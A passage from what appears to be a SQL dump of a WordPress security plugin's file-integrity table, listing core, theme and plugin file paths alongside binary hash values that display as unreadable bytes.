�\")�\"��0I�o��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��q\Zs��q776�','C�D�a�$�=�f[Q�4�JW�7l)�.�=%��','',0,'?'),('�������&Ż�(','wp-admin/js/widgets/custom-html-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tfw�ax�c�~h','h\0�v5�ZZ9���!�4�p��呴!��9y�','',0,'?'),('��ٍ�{���Pm@8@E�','wp-content/themes/fabulous-fluid/js/jcf.radio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{@��A�>�_��k�I','\" ���Aݹ������e�.�r�j�w&�c�','',0,'?'),('��~+�q�X��\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oaQ���|g�4&��','�c�U�X����+�]Wvd�=�,����Z0)\\�','',0,'?'),('�e/����M���/','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/auth/Google_LoginTicket.php',0,'@�n�=������}','@�n�=������}','Dk�[-i�ς�)2OD���	0�!��h���g','',0,'?'),('�g��!\\U�o��b','wp-content/themes/hueman/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������*�u�','�g)�F��Rv�!0�7��0���A���2��#','',0,'?'),('�Bw��:՗k�.I','wp-content/plugins/wordpress-seo/frontend/class-breadcrumbs.php',0,'H;�_Q,��e���','H;�_Q,��e���','j�o�v��n}�I>�ǯ|*,�FkYz:���v�','',0,'?'),('�H?�,p��.��l','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-video/options.php',0,'��\Z#��~�ð\rS��','��\Z#��~�ð\rS��','�<y�0�-s�	�(a\r�IJ%�X`Y/�\n','',0,'?'),('�L|�S@g��c�Jk�C�','wp-content/themes/hueman/assets/front/img/ie/opacity-80-light.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�O�^�\Z����G����','�dd�U�m�\\.\'�9\Z-�1s�\\Gbr�],aj�3','',0,'?'),('�Q�f�xqg����Q/','wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/css/picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�⁠M穪�x�?�h',',��~��R�S@��D\"q�k�-y���S�X�','',0,'?'),('�W�[��lF*Q��M','wp-content/plugins/contact-form-7/admin/includes/welcome-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x����� E9T�','\\�b0��g��PM	���FOe���؉�0�(m','',0,'?'),('�h,P���\n���\"=7','wp-content/plugins/spam-captcha/lang/spam_captcha-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�����S����Ab','F�����\'g�3���%�Ųt�r�H$��','',0,'?'),('��`*���E������','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.nu.php',0,'ìS�eJw��	,���','ìS�eJw��	,���','�<���Q��dC�-a��a��pmHG6�n��','',0,'?'),('�����U~����','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/special-heading/static.php',0,'4���\"ZH&�|�5�V','4���\"ZH&�|�5�V','D(y��DM�����ofI�ݱ���8�d','',0,'?'),('��=CѠ��*TX�4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ր�]P�̍f��Vk�k�','�3}�c9j�my�����@s��p�VR�9Z','',0,'?'),('����2���l�:U�','wp-content/plugins/unyson/framework/extensions/shortcodes/extensions/wp-shortcodes/static/js/plugin.js',0,'�̑�Z�W�9����','�̑�Z�W�9����','��wѼ���W�j�4�p�9�n�6��R�2	��','',0,'?'),('�Ƴ��_�m I��\\�','wp-content/themes/aqueduct/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V*�T�DP�{��','\"%�vO��:b�m�@�ƘIce\n��꣌�� ��','',0,'?'),('��ڷt�g�Z�gE�','wp-includes/class-wp-http-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��y�K���ߕ','�Ι	��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('��hjr�UNSS�?S\"�\\','wp-content/themes/wen-business/assets/images/testimonial-shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�㪱E%ژüA ���','��M��Y+�Y�mQ��Yn9�̽b�����֑-(�','',0,'?'),('����N��	Lh���4V','wp-content/themes/skt-construction-lite/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V;je-op�q��S�F�D','��O��M��]�z|��k/뺽�L��m�Y_','',0,'?'),('�� ��It13&','wp-admin/js/nav-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�븪�9j�H5T��','���d֡\0��P)�5\'�iW��O�:��^�5�9','',0,'?'),('��>��.����F�s�@�','wp-content/themes/fabulous-fluid/images/bullet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��7�馲����','��j7��.?P�VNߐ��SmM&��i�;','',0,'?'),('�\0�F3��~�`5��k','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_size.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�J5oR������7�','�<�g\\��M��&2a��A�P�������','',0,'?'),('�\Z2��L�)L�`�8?U','wp-content/themes/tortuga/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǿ��@ק�Ƶ.�','eK�R(��o�J��|/�����q_\'�i���p','',0,'?'),('�0�����M5�ƺ�','wp-content/themes/fabulous-fluid/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b�t5ECgP��|','lG �d>U]���;2TNPO.v���9��Xa','',0,'?'),('���G�l���ݠ_�','wp-includes/js/dist/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���� ��,%�L�A','Ҏ�������y��}���kP 	�暱���.w�','',0,'?'),('�?�4�xǐ>�n,','wp-content/themes/supernews/acmethemes/core/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,Uy�\n��\\\'[\\�','s��l����4��>%UV�泿Be��*��I+e','',0,'?'),('��rni=w�~�w]�Li','wp-content/plugins/unyson/framework/includes/option-types/oembed/class-fw-option-type-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�-�oC�D�L�L','(6�8l�W�rp����f&g��Pda�#\"��x��','',0,'?'),('��y�I��p�@A76�','wp-content/plugins/unyson/framework/includes/option-types/addable-popup/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�����pj�86���%','E��7ܕ��)=�W5)�ؽ��K%[��/Z�','',0,'?'),('�J-狁��\\\"�ץ&�','wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w.�n��7��I���','����W��.�3$��^�O�:7za��0A�','',0,'?'),('�#���!%f)��_�','wp-content/themes/hueman/option-tree/assets/images/layout/dual-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�.�����Z�̚�X','�sy?�1R�!�n��7������j�Ņ��','',0,'?'),('�2;~Y����ܕDA�','wp-content/plugins/contact-form-7/languages/contact-form-7-af.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� (�D���o0J','�E��2�^��/ۗ���j�ijxM��x��6L','',0,'?'),('�;?2��S��\0��p','wp-admin/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w ���y����C>�','��vV��� v�b��\Z�[Zu�G� GnA�\"�H77','',0,'?'),('�V�,�`�>�ֺ#8xs','wp-content/plugins/contact-form-7/languages/contact-form-7-ml_IN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���wb	`��{���,','>���\ne�M/VR���vt�\r3�GRR�>�^:','',0,'?'),('�W�-�ى��|�Ǘ��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php',0,'��VͲ��Q����','��VͲ��Q����',' �\n�g�e�)��-`/A�k �e[���&G�™�o','',0,'?'),('�X��@��%�1C��i','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�]�.�1\rPXL�','wp-admin/includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8i��������','x,ۑ��1�\"�=q�E1Fs��KF&�d�i�','',0,'?'),('�aH �򏃭���?nL','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�Lo1�f�:','fE���-M�\"\"�GsNq	��1��U�\Z','',0,'?'),('�a�q��+^J�U�S','wp-content/themes/twentyseventeen/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y;#�{����)!_2�','�mo�K[��Ey=2�<t�]�_��w,�ٽ!�Sf','',0,'?'),('�f(�9��6��yaN|2','wp-content/plugins/wordfence/waf/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z^:@��JKL����S','�\rH����n`�>�--\\Tr���7,��','',0,'?'),('�l_S�	9�����[','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php',0,'�~�p�nH��<.Ҕ','�~�p�nH��<.Ҕ','��C}1ⵃDS�t�3d��#Ÿ\\�OP��]�','',0,'?'),('�rY��\0�S���(z|�','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Gb�yf��|��S���','�o��G5}[�`�n��x���ܡ^�@B#���lb','',0,'?'),('�s)�7���/M@);�','wp-content/themes/sg-window/img/icons/digg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dMp�aH_��W�e�','�\'o�~��k%�cAW��?�^�rbH\0A]�','',0,'?'),('�s8��\'��ɀ�\Z%Cx','wp-includes/blocks/archives/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZDTs�����3ߗ�4','۞��	��v�*x����~L~�߶�$����','',0,'?'),('�u$�{���ܨ��v�','wp-includes/blocks/latest-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E]-�\Z�(R8�� -5g','V���O\\;������Q`�]E���Q�gcB','',0,'?'),('�{����T�~�o\n;Kq','wp-content/themes/panoramic/customizer/customizer-library/js/customizer-custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���p)�yڿp��{','(�SS^���c\0.�[5_i}a�f}��w���r','',0,'?'),('�~K�Ɂ�wwf�C�','wp-admin/js/widgets/media-gallery-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�c/����I���<�','�y�\\�R�T�ܠ�U�tmY�(��㻱̿','',0,'?'),('��6r�D0J�?���R�]','wp-content/plugins/unyson/framework/extensions/update/static/css/admin-update-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Л�@�*i%u��Q\\ns','4��%�=_�[�`\r�������?l죒�hS','',0,'?'),('���X���,�R�6a','wp-content/themes/hueman/functions/czr/tmpl/modules/text_editor-module-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_E#�D�v+n�>','��?�7�VH�\r����j<�=hX=b�n�B�i','',0,'?'),('��}z��#����\Z','wp-includes/Requests/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','52]��{�}��	`X','�I?~�4���]4�����K��F��\"v�I(','',0,'?'),('���ƌ\Z��,�H��','wp-content/themes/twentynineteen/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xZ�SY�S�m\"	��a','�UYX�}�m�\",W�9:۸�.�෦Ho�\"�','',0,'?'),('��K���K�1�l�!�D','wp-content/themes/twentytwenty/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ƅ�&8����','̸����������\n�X���Gz�y�\\Kq�WQ','',0,'?'),('��\r���[��\0�EuJ','wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�̦���QK�#΀','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('��5EF��Ҙ�,�cz','wp-content/themes/nirvana/images/patterns/pattern9.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HY����S��Z8c`','\r�AD�<��iX�	�ۦ$��=�_y�}cv��','',0,'?'),('��4�y�3%k� ����','wp-admin/js/widgets/media-image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;k�#?��cQ7��(e','�o��{�\rr�h5��F�w�w�	L�e�Fz�]�','',0,'?'),('���	�hh������','wp-content/plugins/spam-captcha/core/lang/wp_lang_3.5.ini',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\Z��3��A�V1�e','�ϴ5�R�R�u�Ϫ�%��C����d&(��x�','',0,'?'),('���>_CP�إ���3','wp-content/plugins/spam-captcha/lang/spam_captcha-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8	��;�۪��at','��x��&�O�ӱ���4��A\\�= il�#\\�','',0,'?'),('������|� ��','wp-includes/js/masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('���W\r�T輠���9','wp-content/plugins/all-in-one-wp-migration/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����;��4�p�','�;Po���C��Z��z�\"�M{ɧ��&�&Pk�','',0,'?'),('�����#T\rS���xF��','wp-content/themes/fluida/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z�xi_\",�\r��','c,+X&q� �pj�N�^(}��h���$.{�','',0,'?'),('���G?ͥ�#�YR','wp-content/themes/illdy/inc/admin/welcome-screen/sections/github.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���߼�m�������','��6�l����BS��7QˏY{�q�{뚒�','',0,'?'),('��Θ��r(��Ł�� ','wp-admin/js/auth-app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���._��	�/l��ƴ','@H�����7�D�;��|�i\\\\�ޖ��jh','',0,'?'),('���v{C����ҧ��4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�����\"J�3Z��w','�m��e�=�H��oD���OT�\0�v���','',0,'?'),('��p�$^���d�Z','wp-admin/network/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%(F��v\0�~��F','ڙs-s���~�uYe������T��F�4�!� *','',0,'?'),('�ګ�c\r2�8.�\'�\"','wp-content/themes/twentytwentyone/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?yO��+��D��','�\n=/��?I�l�b�i��8�A�HxV�5A?vi','',0,'?'),('��l�#m�Hݙ��I','wp-content/themes/skt-construction-lite/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Tz�c2�2xʷ>�','�.�@T��`�,U��\rDJz����\\�47�_\n�/','',0,'?'),('��[K���b���28�','wp-includes/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{K_��eG�@{	/','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('���6͋��ٖ�vYB','wp-content/themes/illdy/layout/js/pace/pace.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�ׂ��Qa�u','�Ml��j�6(p���o�ڲ�K���O�!�6�','',0,'?'),('�����Rm{Zʢ','wp-content/themes/fluida/templates/template-page-with-intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q]�P�w�I,HB{','f�Rz)�X� Nw`O�c���1�\n`z?g���','',0,'?'),('�\0 �ݳI��&�\n��','wp-content/themes/sg-window/img/icons/small/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\\I�ӱT�ŵ�\\=�u','��V\0k���6!N\'Z}\rO�/����S�Bk=�','',0,'?'),('�\ni��ϳ���Q=','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%&�d�,.�t��',' ;\\�y�~�s	� >��IJZ[Ru��R','',0,'?'),('��NP���<U�����','wp-content/plugins/contact-form-7/admin/css/styles-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!3��(��q�','��Z���Ay+]h�h��%��H�N��ȕ�','',0,'?'),('���X����J��p','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T����Q�x�j�','�����1Y����T��Ј�q�W6݋���h	','',0,'?'),('�&½1YxFu����mpC','wp-content/themes/twentytwentyone/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\\�M�)�x��hC�','vDs>sS��X\0�r���	&gA\\�Ӳ!�O�,�','',0,'?'),('�.�t��HB^�[$J','wp-content/themes/precious-lite/images/mobile_nav_right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I����Y#��&٩O','/E��tX`6�G�>�EPx>�k�[׬�E���','',0,'?'),('�3��!�I��ں��','wp-content/themes/verbosa/cryout/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�1}�#�\\��i','��Kph0k��|5��=S�2s\0��l���!\0��','',0,'?'),('�>���e���B_�)���','wp-content/themes/nirvana/images/socials/Vimeo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L;�V\"QueO\0�','�Γ���uwb�fT.V\\zXVa��EKۍ�>�S)','',0,'?'),('�S���q�`���M�','wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڡq�1�b��4�	G*','{U%�Hv��3�)�|w��-L��&���.䌩','',0,'?'),('�n֢��\r�V5��,�','wp-includes/widgets/class-wp-widget-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ha�+��ޭj�s2���','f��\r`.\\�۬\r�����H�Pg���!M�w�m��','',0,'?'),('�o����l>��x~I� �','wp-admin/network/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���(���4�G�','��j/}Ӆ���\0E�S��̤\\Hg�#Z��._','',0,'?'),('�z�Κr�!Y\\?S�\'*�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.php',0,'��)ȩ��++^�y�K�_','��)ȩ��++^�y�K�_','b�z \"�oHH@�5$l�P�Y:r�b?�1<t','',0,'?'),('���0j�l�S�K�','wp-includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`f�j�6�*2����','����	����w��(ƣO�s>~lii�H=g�!','',0,'?'),('��X��U�*u����Է','wp-content/themes/nirvana/fonts/ubuntu-m-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��\\�N\0��D*��','`����j����|�\r�mD囨�U�֦�c','',0,'?'),('����\'\r�\"c�rk��	','wp-content/themes/nirvana/fonts/opensans-semibold-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�6�k���~�','=��!\n��W�T�|�N���D\\�a�\\�}v�c�','',0,'?'),('����ސ�q�ic�=�','wp-includes/class-wp-simplepie-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��88A�`�w+��p�T','�8u]�p�Q_�t�Rۮ]o}e5#�P5b2BU��','',0,'?'),('��Em#�*�g�E��I�','wp-content/themes/morfeu/core/classes/class-bootstrap-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r%���7���*L�','�_�ֲ�A~�qb���r�(�r��G5��yL','',0,'?'),('��s�ՌQ��7o���','wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ѿD�\0�|����s�W','�\n*�v�Q��(G��i�u�3@��4��*���','',0,'?'),('�«��-j=�u�N\\q\'','wp-admin/css/farbtastic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8)���}{��C�h2U','|A��L��Mb�x�d8X�jX.���^\n\Z�','',0,'?'),('���n�ʸ#����^k/','wp-content/themes/fluida/admin/images/image-style-5.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l7l,$7t�h�� :5','�_���(��kZXn��Ⱥ�~��5�^���','',0,'?'),('��a\'N�<�����','wp-content/themes/verbosa/resources/fonts/fontfaces.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$|��B	C@�)hĂ�','̓�޶��ok�jm�u7�hW�\Z���Q<����','',0,'?'),('��ᗏ�3�-��4�','wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?���\Z��l��-','s̕�����KY\"��_`�$���a�@�[�$U\"�\\','',0,'?'),('���bJ�Sa��-�','wp-content/plugins/all-in-one-wp-migration/lib/view/import/import-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�W�G沎��P�p�','�Sp$��b:ۆic�~.��?sa�N���w�','',0,'?'),('�f<��yHV�w=�Ud','wp-content/themes/panoramic/library/template-parts/header-standard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y���s<�ϐ{\'�y','PE���}�)���i�)�?���I]���v�','',0,'?'),('�S��ٍ��F��R�2','wp-content/themes/alpha-store/img/noprew-related.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��� km���3礷�^','��\Z�Y�AP`�o�8#���R�]I�t�1��','',0,'?'),('�	�K�|��	J�dA�','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-gdrive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BὨ��UR�G���','�/՜�A�O��`N��#O��}�S���^Vv_','',0,'?'),('�\r�v1���Mq��|�','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-s3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oQ�R���Hƅ��~�','0\ri��l�8i6<�Ȕ(Q%�`��>����*','',0,'?'),('�������������','wp-content/themes/tortuga/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��q�օS�GG�k','t�r̯��*�jw��������ֲvT$I��','',0,'?'),('� 2�>�lS@xV�','wp-content/themes/lightly/template-parts/no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�䛼�@�^�� ��O','+d]$L��©q�{��%(�?q�\nc���_�','',0,'?'),('�\"ڕK[@�G����9�','wp-admin/includes/class-wp-theme-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\r^OB�_7�.4','�b�Ӹ�������.�f�$�!����@��K�','',0,'?'),('�#��u0�c���}���','wp-includes/js/dist/i18n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�\Z�f���[�{���<','H����9�trS8#j��4mMk��j|��=�ކ�','',0,'?'),('�$�Q�sP���R3}/','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��9o;&�t���','C۞�`�)�t����f��K|j�����d�~','',0,'?'),('�3!9�=�6�ݡ','wp-admin/images/resize-rtl-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M���M�H�!�YA','�2��m�o��{�|�ny��˃�4(�φ�=�','',0,'?'),('�Dp�3�G�Q(-i�a','wp-content/themes/fabulous-fluid/inc/default-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-\0h�VV�����','�G�*�*����o��6��Q>?\\j�3 �e�','',0,'?'),('�D��O=�?�\'�\'','wp-content/themes/alpha-store/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���)�/��%W�>','׈>*�M�<�L8�C��C<h[���}�,�','',0,'?'),('�Ioo�Ԇ5nu�ѭ��H','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('�N\"�ן����6¬�S','wp-content/themes/alpha-store/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0��D|�-��U`n�',')��|X��6�p �\Z��\\\n��)�⬒?%��','',0,'?'),('�Pk�j�y�4[P�FB','wp-content/plugins/login-lockdown/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�;�᎘���','o�s#��@*��1�; �,�ɖ�IG��\n�~u','',0,'?'),('�Zg�Ui1i�ƾ�x�=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�W�,��XEE�o�','l?���)&&������P��P$@�\\�/�','',0,'?'),('�[��n]\0�P 4q��s','wp-content/themes/illdy/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�>��O��p����','閶��SPH�;�Fu���)�ʼ�xg6���T�','',0,'?'),('�^2^�T��:�mJ��:�','wp-content/plugins/wordfence/lib/IPTrafList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�;s�ռ�;\0+g�','��T���D�H.1\0�B6�E?{��s��g\"��$�','',0,'?'),('�_.{l�FT�J��;','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.fr-CH.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	��͟��9�(�','^�nH����8�g�!���4��S�60]�','',0,'?'),('�b�0݀>j�\"��G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('��M$�1���5F�W_','wp-content/themes/accelerate/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'U)�R�u�A','\Z���t�П\r�k��H߸�����G�3���D{','',0,'?'),('��5F�9c�R�=NkK','wp-content/plugins/unyson/framework/extensions/social/extensions/social-twitter/includes/twitteroauth.php',0,'���o�\Z��l�a��k�','���o�\Z��l�a��k�','�˖b���m�q8:q���S�2�چ��Z��','',0,'?'),('����H{��.Q73l�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/es.js',0,'�������v]N���B�','�������v]N���B�','�&��W��G)�a���C���?@�h\"-�s�','',0,'?'),('��]ɓ짓@�3 �9;O','wp-content/themes/wen-business/inc/hook/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6M��W����m\0�','P���8s�5�•���$�\"��G���Fbb6','',0,'?'),('��$\Z�9	4O|qg	���','wp-content/themes/clean-magazine/languages/sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')������:rLU���','�^A\"�t=��4��	�b/��a�i�(>p*�z','',0,'?'),('���c����Vs�9�o��','wp-includes/css/dist/editor/editor-styles-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�乮�L��)��','�ȣ7�\Z�,�����[x��R,<X���','',0,'?'),('��_��f��VmB��RC','wp-content/themes/aqueduct/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�aɵ6�ls�\n�','�\07��2� Yw�t\"l�����n�Kuf2�͊','',0,'?'),('��O��4����%m�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��?1�	���4��M�','e��2M�B���\n\0��7�0�Zz�F%�s','',0,'?'),('��sC<�:���<�A�','wp-includes/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:�Z{���5�o','���<�s�6��\0,	